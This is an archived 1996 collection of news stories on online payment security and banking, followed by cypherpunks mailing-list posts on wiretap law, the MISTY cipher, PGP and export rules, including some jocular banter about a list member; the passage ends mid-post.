Washington Post: Wednesday, October 9, 1996

AT&T Adds On-Line Card Protection

By David S. Hilzenrath

When it comes to using credit cards on-line, many Internet businesses say their
biggest fear is fear itself.

Citing consumer concerns about the security of credit-card numbers as an
impediment to on-line commerce, two industry powerhouses have introduced
guarantees in an effort to overcome what they call unwarranted anxieties.

AT&T Corp. Tuesday said it would indemnify holders of its own credit card
against fraud when they use AT&T security software to shop at World Wide Web
sites that AT&T maintains for its business clients. That means AT&T would
assume responsibility for the customer's usual $50 deductible.

America Online Inc. said last month that it would assume responsibility for the
deductible when subscribers shop at on-line retailers that have been certified
as meeting its own customer-service standards. That would include about 50 of
the more than 250 merchants on-line with AOL, which only recently began the
evaluation process, said Michael Minigan, vice president of marketing for AOL's
interactive-marketing unit.

``We think that this is a way to jump-start the industry for both businesses
and consumers,'' said Kathleen Earley, vice president of AT&T's EasyCommerce
Services for businesses.

Through the power of the AT&T name and the security guarantee, ``we can help
customers overcome any concerns that they may have,'' Earley said.

AT&T introduced a different guarantee in March, promising that holders of its
Universal Card who also use AT&T as their on-ramp to the Internet would not be
held liable if their credit cards were compromised anywhere in cyberspace.

AT&T said it didn't think the guarantee would cost it much money because the
risk of a security breach is so small.

Many analysts and retailers agree that the burgeoning business of electronic
commerce is battling a perception problem. Concerns about hackers stealing
credit-card numbers on-line have spawned a new industry of companies dedicated
to making on-line transactions secure through the use of encryption.

``There's still a reluctance to use credit cards on-line,'' said David Simons,
managing director of Digital Video Investments, which studies the Internet for
institutional investors.

``It's irrational because there's probably a greater chance of theft or fraud
by giving your credit card out to an individual on an 800 number or ... the
old-fashioned way, over the counter.''

``This is strictly a perception issue,'' said Jeff Bezos, founder and chief
executive of Amazon.Com, an Internet-based bookstore that handles thousands of
sales a day.

``It's so much easier to go through a trash can or dumpster and get credit-card
numbers than it is to break the encryption schemes that are used on the
Internet.''

Still, Bezos said there is evidence that perceptions are changing. When
Amazon.Com opened for business 15 months ago, about half of its customers opted
to provide their credit-card numbers over the phone instead of over the
Internet. Now, 85 percent complete the transactions on-line, Bezos said.


AP Online: Tuesday, October 8, 1996

Bankers Shrug Off Cybertalk

BY E. SCOTT RECKARD

HONOLULU-- Go high-tech or wither, speakers as auspicious as Federal Reserve
Chairman Alan Greenspan told the 1,100-strong American Bankers Association
convention.

''If you don't, you're basically toast, and punishment is swift,'' agreed
convention speaker Don Tapscott, author of ''The Digital Economy.''

You might think conventioneers from the largest organization of U.S. banks
would all be rushing to be first in online banking, computerized marketing to
customers, and other services and automated processes.

You would be wrong, especially at smaller banks, where many seem content to
take a more relaxed approach.

Louis Prichard, president of Farmers National Bank of Danville, Ky., is
computer literate. He rose at 5 a.m. Hawaii time Monday to e-mail colleagues
and check the bank's latest financial picture via his laptop. Farmers has a

World Wide Web site with information about services and rates.

But home and online banking are still being studied by the four-branch, $190
million assets bank, and Prichard says that while Tapscott glossed over
computer security concerns, his customers worry about them.

He wants other banks to solve the start-up problems before he wades in. ''We're
like water skiers: We'll let someone else cut through the waves,'' he says.
''We'll ride along, not far behind.'' Far fewer than half the bank officials in
a huge ballroom at the Hilton Hawaiian Village here held their hands up when
Tapscott asked if they had tried the Internet. Some, like Harold R. Pehlke,
never use computers and are downright hostile to the idea.

Pehlke, 57, chief executive of Republic Bank of Chicago, sat through one of
many small-group sessions on new technology, then announced to the consultant
making the presentation: ''You have convinced me to retire in three years.''

''I wasn't sure I was going to do it, but after listening to you I am.''

Even featured speakers older ones, anyway shared similar views.

William Seidman, head of the Federal Deposit Insurance Corp. under presidents
Reagan and Ford, said he had listened to Tapscott's presentation, ''and my
immediate reaction was, 'Thank God I'm old.'''

On reflection, though, Seidman said he realized that most bank depositors were
probably in no particular rush for high-tech banking.

''Don't panic,'' he told the bankers. ''It'll take plenty of time before your
average customer gets there.''

That sounded good to Gib S. Nichols, a director of the Flathead Bank of
Bigfork, Mont.

''Our customers will let us know when it's time,'' he said.

Seidman, who ran the Resolution Trust Corp. when it began selling off the
wreckage of the 1980s savings and loan debacle, said the now flourishing bank
industry had better watch for risks as well as find new high-tech ways to
market services. Many banks ''are reaching for loans today,'' he said.

''When the going gets tough, the tough get out of the way and let someone else
do the dying,'' he said.

''We used to say as regulators, 'When the tide goes out you'll see who's
swimming without a bathing suit.' Those of you who feel the tide better look
down.''


News Release (NationsBank):Tuesday, October 8, 1996

NationsBank Official Partner of NCL's Internet Fraud Watch

NationsBank (NYSE: NB) is joining the National Consumers League's battle to
ensure the safety and security of online commerce. Through a $100,000 grant,
NationsBank is becoming the exclusive bank sponsor of NCL's Internet Fraud
Watch.

Internet Fraud Watch, launched in February by the League and operated from its
National Fraud Information Center, is a first-of-its-kind program for
monitoring, reporting and preventing fraud on the Internet. NCL shares Internet
Fraud Watch data with local, state, and federal agencies, including the Federal
Trade Commission and state attorneys general, as well as international law
enforcement groups.

"Internet Fraud Watch is a resource that consumers can use to get educated on
the Internet," said NCL President Linda F. Golodner. "Since our launch in
February, our Web site alone has received more than 300,000 visits from
consumers and averaged 25,000 hits a week. We have helped consumers as well as
law enforcement officials keep cyberfraud in check."

The NationsBank grant will significantly expand the Internet Fraud Watch
consumer education and protection programs, according to Golodner.

With plans to offer Web-banking in mid-1997 and more than 120,000 customers
already using its PC banking product, NationsBank ranks online security as a
top priority, according to NationsBank President Ken Lewis.

"NationsBank is happy to help NCL broaden its fraud education and prevention
efforts," said Lewis. "The Internet's growing popularity and potential for
commerce make it a vitally important avenue for American business. It's equally
important that consumers know the Internet is a safe and secure place to do
business."

The Federal Trade Commission rigorously monitors the Internet. The FTC recently
cracked down on a pyramid scheme it believed had bilked consumers of more than
$6 million. It also took action against several firms that marketed business
opportunities by using deceptive claims and false earnings reports.

"Consumers who suspect a scam on the Internet have critical information that
can be used by law enforcement agencies to track down and stop potential frauds
before more consumers are victimized," said Jodie Bernstein, director of the
FTC's Bureau of Consumer Protection. "The Internet Fraud Watch program gives
consumers an easy and cost-free way of providing this information, and it has
been a major help to the FTC in identifying particular scams in their infancy."

National Consumers League advisors field calls about alleged incidents of
online fraud, direct callers to local resources and report the information to
state and federal enforcement authorities. Enforcement agencies use the data to
help shut down cybercrimes and boiler rooms. Work-at-home schemes are among the
top-five scams currently operating online. (NCL Top Five Internet Scams will be
available on Wednesday, Oct. 9.)

Consumers can reach NCL's Internet Fraud Watch by phone through the National
Fraud Information Center at (800) 867-7060, or visit the home page at
http://www.fraud.org . They may also send e-mail messages to
nfic@internetmci.com.


Financial Times: Wednesday, October 9, 1996

Smartcard Trials Extended

The race to replace notes and coins with electronic cash hots up this month as
the Mondex consortium extends trials of its smartcards. The group, which
includes British Telecom, Midland Bank and NatWest Bank, is issuing students at
York and Exeter universities with the cards, which contain a microchip that can
be loaded with electronic money from automatic teller machines and home
telephones.

The cards are "swiped" through retailers' tills to deduct payment for
purchases. Users do not have to sign an authorisation slip as they do with
direct debit and credit cards. Electronic money saves banks and retailers the
considerable costs of handling physical cash. But so far consumers testing
Mondex smartcards in the UK have not received a share of this saving. Mondex is
well ahead of its main rival in the UK, VisaCash, whose backers include
Barclays and Lloyds Bank. It could be a year before VisaCash starts its own
trials; Mondex could be offering its cards to the public by then.
Jonathan Guthrie


AP Worldstream: Tuesday, October 8, 1996

Banker Sentenced to Death for Fraud

HANOI, Vietnam-- A Vietnamese private bank executive has been sentenced to
death after a court in southern Vietnam found him guilty of financial fraud and
stealing funds from accounts, state-run media reported Tuesday.

Nguyen Van Son, deputy general director of Gia Dinh Joint Stock Commercial
Bank, will face a firing squad for his crimes, said the Communist Party
newspaper Nhan Dan, or The People.

Ho Chi Minh City's People's Court convicted Son of fraud linked to the private
bank he and his wife, Thai Kim Lieng, established in 1992. The court said Son
stole about $4.5 million from the bank's accounts.

Unable to collect the necessary capital to qualify for a bank license, Son and
his wife forged several documents claiming they had about $800,000 worth of
funds from 17 shareholders, court records said.

When the State Bank of Vietnam granted the couple a banking license in 1992,
they began siphoning off money from newly opened savings and other accounts.

At the time, the bank had more than $6.5 million worth of accounts, the
newspaper said. The bank also had collected substantial gold reserves.

Son continued to forge credit documents over several years to increase the
bank's financial standing, the report said.

A police investigation in 1994 led to the arrests of Son, his wife and five
other bank associates.

Lieng and bank director Nguyen Le Tue also stood trial with Son. Both were
sentenced to life in prison.

Four other bank executives were sent to prison for terms ranging from 3 to 20
years. Although a number of banking scandals have been reported in Vietnam
since Hanoi began shifting toward a market economy. This latest case is the
largest of its kind and marks the first time a bank executive has been
sentenced to death for his crimes.

Nhan Dan described Son's crimes as ''organized acts that cause extremely
serious consequences and pose dangers to society.''

In addition to the death and prison sentences, the court ruled that the
culprits must repay money taken from the bank.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 10 Oct 1996 17:39:49 -0700 (PDT)
To: Ray Arachelian <sunder@brainlink.com>
Subject: Re: LET'S MEET DIMITRI
In-Reply-To: <Pine.SUN.3.91.961010193221.27368D-100000@beast.brainlink.com>
Message-ID: <Pine.SUN.3.91.961010173356.16360C-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 10 Oct 1996, Ray Arachelian wrote:

> I doubt he's got the nads.  He'd take the money and run, or take the 
> ticket and get a refund or something. 

That will not be allowed to happen.

> so if all those weapons are out of the way, that leaves
> biological weaponry.

No Ray.  No weapons of any sort.  He gets this one for free.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 10 Oct 1996 17:54:46 -0700 (PDT)
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: LET'S MEET DIMITRI
In-Reply-To: <Pine.SCO.3.93.961010190453.21613D-100000@grctechs.va.grci.com>
Message-ID: <Pine.SUN.3.91.961010173953.16360D-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 10 Oct 1996, Mark O. Aldrich wrote:

> I am afraid that, for those of you who do not know him and are expecting
> some ranting tyrant, you're going to be rather disappointed.  He was
> soft-spoken, almost difficult to hear, sometimes, it seemed, even rather
> shy.  He made numerous insightful comments on any number of topics, was a
> pleasant conversationalist, and, in fact, acted like a gentleman in ever
> instance when I saw or spoke with him.  To meet him solely in person,
> you'd be impressed with his obviously diverse education and background,
> and rather quiet disposition.  As anti-climactic as it may be, he was 
> actually a nice, unassuming fellow with a sense of humor and a
> pleasant demeanor.  Hell, he even had decent table manners.

Given all that Mark has said, I now MORE THAN EVER want to meet
Dimitri in person.  But let's hear from him.

BTW, another private pledge for $20 has come in.  Kaching!


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 10 Oct 1996 14:52:36 -0700 (PDT)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: LET'S MEET DIMITRI
In-Reply-To: <Pine.SUN.3.91.961010064043.5943A-100000@crl4.crl.com>
Message-ID: <Pine.SUN.3.91.961010175149.27368B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Oct 1996, Sandy Sandfort wrote:

> Bay Area Cypherpunks,
> 
> I am hereby pledging US$100 towards a fund to fly Dimitri to the
> SF Bay area for a Cypherpunk meeting.  I certainly would like to
> meet a real cryptographer, and I'm sure many of you would too.
> We should throw in a hotel room and local transportation as well.  
> I want Dimitri to be our featured speaker--his choice of topic, 
> of course.
> 
> I am ABSOLUTELY serious in this offer, but I will need donations
> from other Cypherpunks.  If I get sufficient pledges to cover 
> Dimitri's travel expenses, I will coordinate with Dimitri and
> make the necessary travel and hotel arrangements.
> 
> Dimitri, what say you?  Are you willing in flying to California 
> to address the Mother of All Cypherpunk Meetings?  I hope so.
> I'm sure it would be one of our most highly attended meetings.

I hereby pledge $50. :)  Now who is funding the baseball bat committee on 
this same topic? :)

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |  God of pretzles!" |AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 10 Oct 1996 17:59:07 -0700 (PDT)
To: Sandy Sandfort <sunder@brainlink.com>
Subject: Re: LET'S MEET DIMITRI
Message-ID: <199610110058.RAA00679@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:26 PM 10/10/96 -0700, Sandy Sandfort wrote:
>C'punks,
>
>On Thu, 10 Oct 1996, Ray Arachelian wrote:
>
>> I hereby pledge $50. :)  Now who is funding the baseball bat
>> committee on this same topic? :)
>
>Thanks you Ray.  Now who's next?
>
>
> S a n d y
>
>P.S.	Regretably, if Dimitri has big enough 'nads to
>	take us up on this offer, as my guest, he will
>	be under the mantle of my protection.  Therefore,
>	no kinetic, edged or energy weapons allowed.



Excellent!  Chemical weapons WEREN'T MENTIONED!  (Now where did I put that beaker...)



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 10 Oct 1996 15:13:09 -0700 (PDT)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: legality of wiretapping: a "key" distinction
In-Reply-To: <Pine.SUN.3.94.961009160249.26562A-100000@polaris>
Message-ID: <Pine.BSF.3.91.961010181108.12910A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 9 Oct 1996, Black Unicorn wrote:
> On Wed, 9 Oct 1996, Vladimir Z. Nuri wrote:
> > Unicorn writes:
> > 
> > [challenging wiretap laws]
> > >And we seasoned lawyers, three of us last I counted, told you that you
> > >were an idiot for suggesting it.  I guess we hurt your feelings because
> > >you turned around and asked for a "civilized" lawyer.  (Read: one who will
> > >listen to your ranting).  You wanted a legal opinion, you got more than
> > >one. Now go away.
> > 
> > look, I was not going to rub this in your face at all, but you don't
> > seem to have a clue about this. the fact that you/others here can't 
> > scrounge enough imagination to come up with an attack against wiretap laws 
> > based on case law and think such a think is a waste of time
> > is pretty meaningless in your case. I don't think
> > you have an imaginative bone in your body, hence the great vitriol
> > that you unleash upon me whenever I use my own.
> 
> Well "Vlad," as the most creative lawyer on the list, it seems it's up
> to you to get us out of this mess we are in.  I'm certainly not biting the
> bait and researching the topic for you because you call me unimaginative.



Given all the members of so-called "Organized Crime" who have been 
convicted using wiretaps, we must assume that all of their lawyers were 
similarly unimaginative.

Don't tell Don Vito!




> 
> Clearly no one on the list cares.  Perhaps you should look elsewhere for
> your support (hint hint).
> 
> > from the article just recently posted:
> > 
> > >
> > >http://www.sfgate.com/cgi-bin/examiner/article.cgi?year=1996&month=10&day=06&art
> > >icle=BUSINESS2814.dtl
> > >
> > >Encryption controversy pits life against liberty
> > 
> > >"Wiretapping is the main issue," said Stewart Baker, former general counsel
> > >of the National Security Agency, the CIA's code-breaking and eavesdroping
> > >cousin.
> > 
> > as TCM just pointed out, this is a departure on the part of the administration
> > in describing the tactics of clipper. clearly, WIRETAPPING AUTHORITY IS
> > KEY TO CLIPPER LEGITIMACY. hence a legal challenge to wiretapping is an
> > extremely critical angle to the situation.
> 
> "Newtonian Science is the KEY TO TRAVEL TO THE MOON.  Hence a challenge to
> newtonian Science is an extremely critical angle to the situation.
> 
> Note the similarities.  1> We've already been to the moon.  2> Newtonian
> Science is unlikely to be argued away in a way that will negate moon
> travel any time soon.
> 
> I understand that it's difficult for you to grasp how firmly entrenched
> the concept of wiretapping is in law enforcement, courts and the
> legislature, and that your novel new approach has been tried before.
> Part of the reason its hard for you to understand is because you haven't
> bothered to go check.  Instead you have to look for civil libertarian
> lawyers to try and say what you can't because you haven't looked.
> 
> You repeating your claim over and over again isn't going to get me to lift
> a finger to research it for you.  You've been given several suggestions as
> to where to look to show the massive holes in your claim in about five
> minutes.  I think if you were to give it a try you would redden quite
> quickly on realizing how hard us "imaginationless" lawyers were laughing
> at you all this time.
> 
> > >"If two criminals are discussing a plot over the telephone and we have a
> > >wiretap order, the encryption would negate the wiretap," said Michael
> > >Vatis, a senior Department of Justice official.
> > >
> > ...
> > 
> > >"For serious investigations involving terrorists or organized crime . . .
> > >where you're worried about hundreds of people being killed . . . the whole
> > >point is to keep the investigation secret or the whole thing blows up," he
> > >said.
> > 
> > as I just recently wrote, it seems to me one of the key points of discussion
> > that is just now emerging in this debate is the demand by the gov't
> > that wiretapping be done IN SECRET without knowledge of the suspect,
> 
> This is nothing new "Vlad."  It's been a point of contention for over 50
> years and a well settled one for the last 25-30.  Go look it up.
> 
> I also call upon you to look at the sources of these claims.  Stewart
> Baker, now at Steptoe and Johnson, formerly of the NSA, heard speaking at
> the ABA Conference on Law Enforcement and Intelligence.  Michael Vatis,
> also heard speaking at the ABA Conference, sidekick of Gorelick and young
> shining star in the Justice Department.  These are the people who will
> benefit from associating wiretap and crypto because wiretap is extremely
> unlikely to be challenged as an investigative tool in any way shape or
> form.  These are the arguments of the law enforcement side.
> 
> You are shooting crypto in the foot if you allow wiretapping into the
> argument.  You are doing more damage than good.
> 
> > whereas civil libertarians seem to be challenging this point in particular.
> > it could be a magic bullet it defeating wiretapping. it seems to really
> > get to the core of the debate about key escrow etc.
> 
> No, what gets to the core of the debate about key escrow is whether strong
> encryption which does not comply will be made illegal to possess or use.
> This is a meaningless detour and a waste of time.  So much so that I
> wonder if you are not working for some local agency (I say local because
> your posts are simply not crafty enough to be any kind of concerted
> disinformation attempt on the part of authorities with wider briefs).
> 
> Meaningful attempts to derail Clipper will come along the same lines they
> always have.  Economic objections made by industry and challenges to
> thinly stretched regulations like ITAR which have been untested in the
> vein before.  Revamping the country's entire wiretap law is not only a far
> fetched project, its nearly a wild goose chase.  Please take it elsewhere.
> 
> > >Not so, argued Daniel Weitzner, an attorney with the civil libertarian
> > >Center for Democracy and Technology inWashington, D.C. Forgetting
> > >encryption for a moment, Weitzner said, a wiretap is unlike any other tool
> > >in the
> > >investigator's arsenal.
> > >
> > >"To get documents sitting on my computer, the FBI has to come into my
> > >office with a search warrant," Weitzner said. "I have to know about it."
> > 
> > the same distinction again. very interesting.  I was just emphasizing
> > that in my post.
> 
> Notice, however, that he doesn't suggest trying to overturn the wiretap
> laws to get at Clipper.  Same distinction there too.
> 
> Law enforcement says "We need this power" attorneys with the Center for
> Democracy and Technology (which by the way, while "Vlad" respects in
> terms of legal prowess, I do not) whine "But they never should have
> gotten wiretap technology in the first place."
> 
> You really thing that's a positive argument?  Go for it.  Dedicate your
> life to the subject.  You have all my encouragement.
> 
> > >Exactly the reverse is true for a wiretap. To be effective, the subject
> > >must be ignorant of the tap. Weitzner said this
> > >notion of a "secret search" went against a central principle of the Fourth
> > >Amendment, which protects people from
> > >unreasonable search and seizure.
> > 
> > whoa, apparently this would be news to Unicorn, who thinks it would be
> > a waste of time to argue against the established legitimacy of wiretapping
> > and considers himself a premiere lawyer-dude.  well, I'll just let Unicorn
> > argue with Weitzner, (whose credentials are rather impressive and I 
> > trust more, btw..)  I'd be interested to hear what Weitzner says, 
> > Uni...
> 
> I won't be talking to Weitzner obviously.  It a losing man's argument.
> "We wouldn't be in the mess we are in now if the Supreme Court hadn't
> gelded the 4th amendment in the early years of its development."
> 
> Good luck.
> 
> If Weitzner's credentials are so impressive, why isn't he in private
> practice where the big money and influence are?  That's where Stewart
> Baker is.  That's where Gorelick is heading.  That's where Freeh is
> headed, and it's what Vatis will be up to in 3 years time.
> 
> > so what we have here is a very knowledgeable lawyer who has helped
> > out EFF argue that wiretaps are unconstitutional based on the precise
> > aspect that I was focusing on in a post that Unicorn flamed me for:
> > that they are secret, unknown to the suspect,
> > and that this thereby might constitute an "unreasonable"
> > search and seizure. I don't claim to have originated this of course, but
> > I was emphasizing it in my post, and Unicorn objected.
> 
> Then it seems you should take the discussion to the great legal mind of
> our times, Weitzner, rather than waste our time and bandwidth with it.
> 
> > reading what Weitzner wrote, it is not inconceivable to imagine
> > him having the position that wiretaps in their present form might
> > not survive a court challenge, i.e. it would at least not be
> > a waste of time to mount such a case, as Unicorn belligerently
> > bellows above is obvious to anyone with a smidgeon of legal
> > background..
> 
> So call him and foster such a challenge "Vlad."
> 
> I'm anxious to hear about your progress.
> 
> Oh, speaking of which, what happened to your super-clever ISP encrypts
> every peices of mail that comes in idea?  I don't see it mentioned here.
> 
> --
> I hate lightning - finger for public key - Vote Monarchist
> unicorn@schloss.li
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 10 Oct 1996 15:34:01 -0700 (PDT)
To: David Wagner <daw@cs.berkeley.edu>
Subject: Re: MISTY Algorithm
Message-ID: <1.5.4.16.19961010223106.0f570568@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:41 AM 10/10/96 -0700, you wrote:

>Perhaps they are referring to
>
>Mitsuri Matsui, ``New Structure of Block Ciphers with Provable
>Security against Differential and Linear Cryptanalysis'',
>Fast Software Encryption '96, LNCS 1039, Springer-Verlag, 1996.
>
>which provides specifications, test vectors, analysis, etc. of
>a new cipher from Matsui?

-----


   That is surely accurate: a c'punk linked Matsui to MYSTY a 
   while back.

   Below is a year-old announcement on Mitsubishi's MISTY
   encryption algorithm.

   We have requested information on the October 8
   announcement that the algorithm is to be released for
   third-party evaluation along with a sample program for
   doing so (see E-mail address below for inquiries).

   -----

   http://www.melco.co.jp/rd_home/new/crypt_e.html


   Mitsubishi Electric Develops New Encryption System
   "MISTY", More Powerful Than DES (Data Encryption
   Standard) for Communication Networks

   -- Security Strictly Evaluated in World's First Practical
   Block Ciphers --


   Tokyo, October 27, 1995 -- Mitsubishi Electric has
   developed a new block cipher algorithm for an encryption
   system, which is essential technology for protecting the
   privacy of individuals and confidential information in
   communication networks, that makes both strength and
   speed compatible.

   The encryption algorithm is based on a cipher strength
   evaluation index, which applies the "linear
   cryptanalysis", a powerful decoding method unique to
   Mitsubishi Electric, and the "differential
   cryptanalysis", considered to be an effective decoding
   method next to the linear cryptanalysis. Mitsubishi
   Electric has succeeded in strictly evaluating the
   security of this encryption algorithm against these
   decoding methods.

   Background: 

   Using ciphers on wide-area networks requires a method to
   maintain security as long as its encryption key (password
   commonly shared by a sender and a receiver) is kept
   secret, even if the mechanism of the encryption is made
   public.

   However, possibilities of unauthorized access will
   increase when the encryption mechanism is made public. In
   fact, several encryption algorithms, whose specifications
   were made public, have been compelled to make
   specification changes, and to sacrifice their encryption
   speed in return for an increased cipher strength to
   protect against recent decoding methods. This is why an
   encryption system whose security against these decoding
   methods is strictly evaluated at the design stage has
   been required.

   Security of encryption is formulated as the lower limit
   of the number of calculations needed for decoding. A
   powerful decoding method leads to a stricter safety index
   in that it reduces the number of calculations needed for
   decoding.

   At present, the "linear cryptanalysis" is considered to
   be the most effective general-purpose decoding method. A
   decoding method called the "differential cryptanalysis"
   is another widely known decoding method next to the
   "linear cryptanalysis". A evaluation based on the linear
   and differential cryptanalysis is therefore considered to
   be the most reliable among strength indexes of block
   ciphers.*1

   *1 Block ciphers : Plain texts and cipher texts that are
   processed by being grouped into units called blocks; most
   widely used at present.

   Outline of Development:

   Since announcing the linear cryptanalysis, Mitsubishi
   Electric has been making efforts to develop encryption
   technology backed by adequate security. In January 1994,
   Mitsubishi Electric performed the first successful
   experiment to decode the Data Encryption Standard (DES),
   an American standard commercial encryption system, to
   quantitavely evaluate its strength using this linear
   cryptanalysis.

   Using this evaluation technology, Mitsubishi Electric has
   developed an encryption algorithm that quantitavely
   provides sufficient security to linear and differential
   cryptanalysis and achieves a practical encryption speed.
   The encryption algorithm can clarify the relationships
   between encryption speed and strength and allow users to
   use an encryption that meets their security needs.

   Mitsubishi Electric plans to develop software tool
   products and hardware products (LSIs) using this
   encryption algorithm. Mitsubishi Electric will make the
   specification of this encryption algorithm public and
   will also promote its use.

   Address questions or comments to:
   www-rd@hat.hon.melco.co.jp 

   [End of announcement]

   Note: Mistubishi is developing LSI chips at two specialty
   laboratories at Itami. Sparse information is available by
   links from Mitsubishi's home page at:

   http://www.melco.co.jp

   An inscrutable (^^) image of an LSI encryption chip is at:

   http://www.melco.co.jp/rd_home/map/j_s/item/pat1/uf1-7-e.html











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pclow <pclow@pc.jaring.my>
Date: Wed, 9 Oct 1996 21:25:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Crypto AG - Secret GAK Partner ?
In-Reply-To: <Pine.3.89.9610041356.B3645-0100000@skypoint-gw.globelle.com>
Message-ID: <325CDEE2.86A@pc.jaring.my>
MIME-Version: 1.0
Content-Type: text/plain


Hi fellow flamers, cuss'ers, ect..

Some one recently gave me a copy of an article in Der Spiegel
(unfortunately in german!) stating that Crypto AG of Switzerland
had passed the keys to the German Govt without informing the
customer.

Can someone confirm, elaborate, dispute...... please.... :)

Thanks.



---------------------------------------------------------------------------
Flame AAway.....
" Sticks and stones may break my bones, but words will never hurt me"
===========================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <liberty@gate.net>
Date: Thu, 10 Oct 1996 15:43:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Why not PGP?
Message-ID: <199610102241.SAA15788@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: rollo@artvark.com, cypherpunks@toad.com
Date: Thu Oct 10 18:39:42 1996
Rollo Silver wrote:

<snip>

> I use PGP to communicate (presumably) strong-cryptoed messages to my
> stepson Ray Hirschfeld in Amsterdam, and vice versa. He uses an
> internationational version of PGP, and I use the domestic version that I
> got from MIT. They seem to be compatible.

They are.

> I don't intend to submit my present or future private PGP keys for key
> escrow (Is that what's called GAK?).

Good. (Yes.)

> To protect myself against forgetting
> my private key (which has happened once already) I'll no doubt some day
>  put
> it on a floppy and put the floppy in my bank safe deposit box.

This protects against forgetting your passprhase only if you have that on 
the disk in plaintext. It protects you against harddrive crashes, though, 
which is a good thing.(tm)

> Two questions:
> 
> 1. Does anyone think that legislation might be passed which would
> criminalize my communications with Ray?

Yes. [It's possible. But not before the election for obvious reasons.]

> 2. Suppose someone writes a program Z that has no expicit crypto code in
> it, but has hooks for installing one or another version of PGP. Given a
> copy of Z, someone in this country could install PGP he got from MIT,
> whereas someone in Europe could install the international version.
> Would export of Z violate ITAR restrictions?

Yes.
JMR


One of the "legitimate concerns of law enforcement" seems to be
that I was born innocent until proven guilty and not the other
way around. -- me

Defeat the Duopoly! Vote Harry & Jo http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
I will generate a new (and bigger) PGP key-pair on election night.
<mailto:jmr@shopmiami.com> http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMl17M21lp8bpvW01AQHFlAP9Fyw3hs4K+wsXND9EPwPew7P9kdVGV4is
2pTHvni81dDA2ZIRuGe/JqHbtY4RkJ+/EH85pyf+nvlpfsmaszR6xCDfMHBx2T/s
yXYlExJoG/cysykX/PuYHnkywie1UApGlaQzj+t4N1yMJk/BsPxrYWb5huACd3cG
QeQywVDBYVA=
=rLgj
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott McGuire <svmcguir@syr.edu>
Date: Thu, 10 Oct 1996 15:45:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
In-Reply-To: <961010.071747.6d6.rnr.w165w@sendai.scytale.com>
Message-ID: <ML-2.2.844987494.9124.scott@homebox.>
MIME-Version: 1.0
Content-Type: text/plain


roy@scytale.com said 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In list.cypherpunks, aba@dcs.ex.ac.uk writes:
> 
> > Dimitri Vulis <dlv@bwalk.dm.com> writes:
> >> [...]
> >> Another possibility is to issue a charge card (payable in full at
> >> the end of the month, getting revenue from the annual fee), rather
> >> than a credit card, so it could claim not to be subject to certain
> >> Federal Reserve's regulations that have to do with credit card
> >> disputes. But then it probably can't be Visa/MC and can't use their
> >> clearginhouses.
> >
> > I have a VISA card which is purely a debit card.  It is accepted all
> > the places any standard VISA card would be.  (UK, Lloyds bank).
> 
> I have one of those, too.  A couple of months ago, Thrifty car rental
